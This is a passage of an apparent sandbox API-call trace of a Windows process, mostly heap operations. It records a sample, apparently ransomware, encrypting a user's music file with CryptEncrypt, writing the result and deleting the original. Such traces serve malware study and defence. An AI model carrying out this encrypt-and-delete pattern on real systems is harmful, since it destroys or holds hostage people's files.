Flags=0x0, Size=0x10) returned 0x43ca718 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0109.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0109.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0109.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0109.589] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0109.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0109.589] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0109.719] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0109.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0109.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0109.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0109.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0109.723] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0109.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0109.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0109.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0109.724] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x6fb6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x6fc0) returned 1 [0109.724] CharLowerBuffW (in: lpsz="byte[28609]", cchLength=0xb | out: lpsz="byte[28609]") returned 0xb [0109.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0109.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0109.725] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452af50*, pdwDataLen=0x144e790*=0x6fb6, dwBufLen=0x6fc0 | out: pbData=0x452af50*, pdwDataLen=0x144e790*=0x6fc0) returned 1 [0109.725] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.725] WriteFile (in: hFile=0x258, lpBuffer=0x451cfd8*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x451cfd8*, lpNumberOfBytesWritten=0x144f194*=0x6fc0, lpOverlapped=0x0) returned 1 [0109.726] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0109.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca2b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0109.727] CryptDestroyKey (hKey=0x41ac640) returned 1 [0109.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.727] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0109.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0109.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0109.727] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0109.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.728] FreeLibrary (hLibModule=0x756e0000) returned 1 [0109.728] CloseHandle (hObject=0x298) returned 1 [0109.728] CloseHandle (hObject=0x258) returned 1 [0109.730] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a", lpFilePart=0x0) returned 0x20 [0109.731] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\2 maj1.m4a")) returned 0x20 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0109.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0109.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0109.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0109.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0109.732] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d900a30, ftCreationTime.dwHighDateTime=0x1d5e918, ftLastAccessTime.dwLowDateTime=0x2cc0f370, ftLastAccessTime.dwHighDateTime=0x1d5eac4, ftLastWriteTime.dwLowDateTime=0x2cc0f370, ftLastWriteTime.dwHighDateTime=0x1d5eac4, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="2 MaJ1.m4a", cAlternateFileName="2MAJ1~1.M4A")) returned 0x41ac440 [0109.732] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\2 maj1.m4a")) returned 1 [0109.991] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d900a30, ftCreationTime.dwHighDateTime=0x1d5e918, ftLastAccessTime.dwLowDateTime=0x2cc0f370, ftLastAccessTime.dwHighDateTime=0x1d5eac4, ftLastWriteTime.dwLowDateTime=0x2cc0f370, ftLastWriteTime.dwHighDateTime=0x1d5eac4, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="2 MaJ1.m4a", cAlternateFileName="2MAJ1~1.M4A")) returned 0 [0109.991] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.991] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: 